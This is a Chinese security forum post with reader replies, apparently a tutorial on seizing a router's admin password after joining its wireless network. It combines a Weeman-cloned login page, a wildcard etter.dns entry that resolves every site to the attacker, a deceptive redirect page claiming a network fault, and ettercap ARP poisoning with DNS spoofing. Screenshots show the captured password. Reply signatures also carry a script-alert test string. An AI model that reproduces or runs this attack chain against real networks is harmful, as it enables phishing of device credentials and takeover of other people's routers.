用户
搜索
  • TA的每日心情
    开心
    2017-9-26 14:01
  • 签到天数: 6 天

    连续签到: 1 天

    [LV.2]偶尔看看

    i春秋-核心白帽

    尊师坏蛋

    Rank: 4

    42

    主题

    158

    帖子

    1238

    魔法币
    收听
    0
    粉丝
    60
    注册时间
    2015-12-3

    春秋巡逻i春秋签约作者积极活跃奖春秋游侠

    发表于 2016-8-28 14:03:52 1413557
        本篇文章主要介绍如何在接入无线网络后如何拿到路由器的管理权限,至于如何得到路由器连接密码可以参考 WPA-PSK无线网络的破解  ,本文只提供一个思路。我们大致的思路是通过weeman伪造登录页面,ettercap进行arp欺骗DNS劫持,从而让管理员跳转到我们的钓鱼页面,欺骗输入管理密码。

    测试环境:
                         攻击者:                192.168.0.101            kali linux 2016.1
                         目标管理员:        192.168.0.100             Windows 10
                         路由器管理地址: 192.168.0.1   

                首先我们需要生成一个伪造的登录页面,需要用到的工具为Weeman,关于这个的工具的介绍并不多,大家可以参考简单易用的钓鱼渗透测试工具Weeman新版发布。
    1.设置伪造的目标地址:
    [JavaScript] 纯文本查看 复制代码
    set url [url]http://192.168.0.1/login.asp[/url]

    2.设置端口号:
    [AppleScript] 纯文本查看 复制代码
    set port 8080
    [font="]
    3.设置转跳地址(登录成功后的页面):
    [AppleScript] 纯文本查看 复制代码
    set action_url [url]http://192.168.0.1/index.asp[/url]
    [font="]
    通过简单的配置就可以运行了
    [AppleScript] 纯文本查看 复制代码
    run
    1.png
    可以看到他已经Download了目标地址并放在了8080端口下,此时他会在在程序的根目录下生成一个index.html文件,但是我们访问后发现效果并不是很好。 2.png 其实这个脚本只是单纯的将HTML代码进行了缓存,并没有对支持网页的一些资源(CSS/JavaScript/图片)进行缓存。为了让我们的钓鱼页面更具有欺骗效果,我们对他进行一些简单的优化,首先我们打开正常的登录页面 Ctrl + S 将整站进行保存 0[237JXKADD8_M{K4GH@O8A.png
    我们将下载的文件放在与index.html同目录(weeman根目录)下。注:此处我们可以还需要改一下index.html引入的路径。
    最终效果(时间原因并没有加上所有图片):
    SR~DDIA]N_C$AN(MA(V}_YL.png
    至此,我们第一步已经完成下面我们要上利器ettercap,在这之前我们先做一下简单配置。
    首先我们需要配置一下DNS文件,在etc/ettercap/etter.dns 内添加一行
    [AppleScript] 纯文本查看 复制代码
    *     A     192.168.0.101

    * 为通配符,这一行的意思为将所有的网站全部解析到192.168.0.101(攻击者IP)。
    5.png
    然后我们开启apache服务,让攻击者的电脑成为一个web服务器
    [AppleScript] 纯文本查看 复制代码
    service apache2 start 

    6.png

    现在我们去做一个简单的转跳页面放在apache的www目录(var/www/html)下,通过这个转跳页面转到我们的钓鱼页面,当然这个转跳页面也要具有一定的欺骗性。
    [XHTML] 纯文本查看 复制代码
    http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <!DOCTYPE html>
    <html>
      <head>
        <meta charset="utf-8">
        <title></title>
        <script type="text/javascript">
          alert("网络连接失败,请尝试重新配置路由器!");
          location.href='http://192.168.0.101:8080';     <!--钓鱼界面-->
        </script>
      </head>
      <body>
    
      </body>
    </html>

    这段代码可以实现,再打开这个后弹窗 “网络连接失败,请尝试重新配置路由器!”,然后转调至我们的钓鱼页面。
    下面我们打开ettercap进行dns欺骗

    依次选择Sniff -> Uuified Sniffing选择网卡
    7.png
    Hosts->Scan for hosts 扫描在线主机
    8.png
    Hosts -> Hosts list 列出在线主机列表
    9.png
    选中 192.168.0.1 -> add to target 1 然后 192.168.0.100 -> add to target 2
    10.png
    Mitm -> Arp Poisoning 将第一项打勾 开启ARP欺骗
    11.png
    Plugins -> Manager the plugins 双击打开dns_spoof模块启动DNS劫持。

    最后Start -> Start Sniffing 开启ARP欺骗+DNS劫持。
    我们在目标主机ping常用网站 发现解析地址已经转到攻击者IP
    13.png
    我们模拟管理员正常上网,打开一些常用网站
    14.png
    已经成功解析到攻击者IP ,我们点击确定后转跳到钓鱼页面(忽视这个不完美的钓鱼页面)。
    ZAS0UW$P5VJC(1M[~C@1))0.png
    输入管理密码,正常登陆
    (D}PWTUCG$D${`H[]GK)3F3.png
    此时,我们后台的Weeman已经成功劫持到密码。
    17.png

    原创文章,首发自知乎专栏。








    12.png
    不可告人的秘密:ixuehua.blog.163.com


    -
    <script>alert(/xxx/)<script>
    发表于 2016-9-13 11:28:45
    文章奖励介绍及评分标准:http://bbs.ichunqiu.com/thread-7869-1-1.html,如有疑问请加QQ:286894635!



    基本项加分项
    作者帖子标题内容要求内容稀缺性文章篇幅文章深度文章可读性是否系列文章排版优化总分
    sn0w通过Weeman+Ettercap配合拿下路由器管理权限
    0




    0

    非首发i春秋,不予奖励。

    Hacking the earth.My Blog:https://isbase.cc
    使用道具 举报 回复
    坏蛋 管理员 欢迎大家来春秋群找我玩
    沙发
    发表于 2016-8-28 19:47:56
    这都是在咱们社区首发原创的吗
    欢迎加入i春秋QQ群大家庭,每人只能任选加入一个群哦!
    投稿请加QQ:780876774。

    i春秋—楚:713729706
    i春秋—魏:687133802
    网安交流群:820783253
    使用道具 举报 回复
    学习了 ,谢谢
    使用道具 举报 回复
    表弟可以的。
    使用道具 举报 回复
    发表于 2016-8-29 10:15:36
    精彩!
            我用双手成就你的梦想
    使用道具 举报 回复
    发表于 2016-8-29 13:25:07
    yyyxy 发表于 2016-8-28 11:47
    这都是在咱们社区首发原创的吗

    这个是在知乎专栏发过了  现在转过来的
    不可告人的秘密:ixuehua.blog.163.com


    -
    <script>alert(/xxx/)<script>
    使用道具 举报 回复
    发表于 2016-8-29 14:19:34
    路过看啊看~~~~~
    寻一方沃土
    使用道具 举报 回复
    发表于 2016-8-30 10:16:54
    使用道具 举报 回复
    发表于 2016-8-30 10:17:20
    使用道具 举报 回复
    发表于 2016-8-30 15:07:22
    好东西,正需要
    使用道具 举报 回复
    发表于 2016-8-30 15:38:54
    看看学习啊呵呵顶你啊
    使用道具 举报 回复
    发表于 2016-8-30 16:10:27
    太谢谢了!!
    使用道具 举报 回复
    之前试过。。。抓了一夜  也没抓到 还采用了劫持 提示路由器有问题还是没抓到
    使用道具 举报 回复

    精彩!
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册